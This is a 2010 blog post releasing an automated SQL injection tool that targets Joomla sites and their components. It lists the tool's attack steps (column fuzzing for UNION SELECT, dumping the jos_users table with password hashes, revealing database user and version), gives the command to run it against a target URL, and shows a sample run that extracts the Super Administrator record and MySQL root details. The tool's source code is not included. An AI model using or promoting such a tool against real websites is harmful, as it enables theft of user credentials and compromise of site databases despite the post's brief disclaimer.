Today I am releasing my Automated Joomla SQL Injection Exploiter version 1.0 (23th May 2010).
I wrote this tool because I did not want to write a new exploit every time when a new Joomla (component/module/plugin) SQL injection vulnerability was discovered/revealed. Simply hand over a vulnerable Joomla URL to the tool and receive all Joomla users (with password hashes).
The Automated Joomla SQL Injection Exploiter exploits almost every SQL injection vulnerability which was and will be discovered in Joomla or it’s components/modules/plugins. From now on you don’t need an exploit for every new SQL injection vulnerability! Just hand over the vulnerable URL to the tool and receive a list of Joomla users. The Automated Joomla SQL Injection Exploiter is based on my column fuzzer.
– Check if URL is reachable
– Fuzz amount of columns (needed for UNION SELECT attack)
– Show a sample exploitation URL for pasting into the browser
– Showing the Joomla users from the table jos_users (with password hashes)
– Display current database, database user and database version
Written in Python (less than 300 lines).
root@localhost: python joomla_sqli_sploiter.py -u “http://target/index.php?option=com_vulnerable?id=1”
Tool was written for educational purposes only. I am not responsible for any damage you might cause using this tool. Know and respect your local laws! Only use this tool on websites you are allowed to test, e.g. for penetration testing.
Sample Output (bad formatted, sorry about that)
<root@localhost: python joomla_sqli_sploiter.py -u “http://target/index.php?com_option=blubb&id=1”
Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)
by Valentin Hoebel (firstname.lastname@example.org)
For educational purposes only! I am not responsible if you cause any damage!
Only use this tool on websites which you may test, e.g. for penetration testing.
>> Checking if connection can be established…
>> Connected to target! URL seems to be valid.
>> Assuming that your provided URL is vulnerable.
>> Trying to find the correct number of columns… (this may take a while)
>> Correct number of columns found!
>> Amount: 21
>> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) no
>> Viewing a sample exploitation URL was skipped!
>> Now assuming that this is a Joomla installation.
>> Trying to fetch the first user of the Joomla user table…
Name: [‘Administrator’] Username: [‘admin’]
Password Hash: [‘censored’]
E-Mail Address: [‘email@example.com’] User status: [‘Super Administrator’]
>> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) no
>> Viewing the Joomla user table output was skipped!
>> Do you want to display the current database, database user and MySQL version? (Yes/No) yes
MySQL Database User: [‘root@localhost’]
MySQL Database: [‘joomla’]
MySQL Version: [‘5.1.34-0.dotdeb.1-log’]
That’s it. Bye!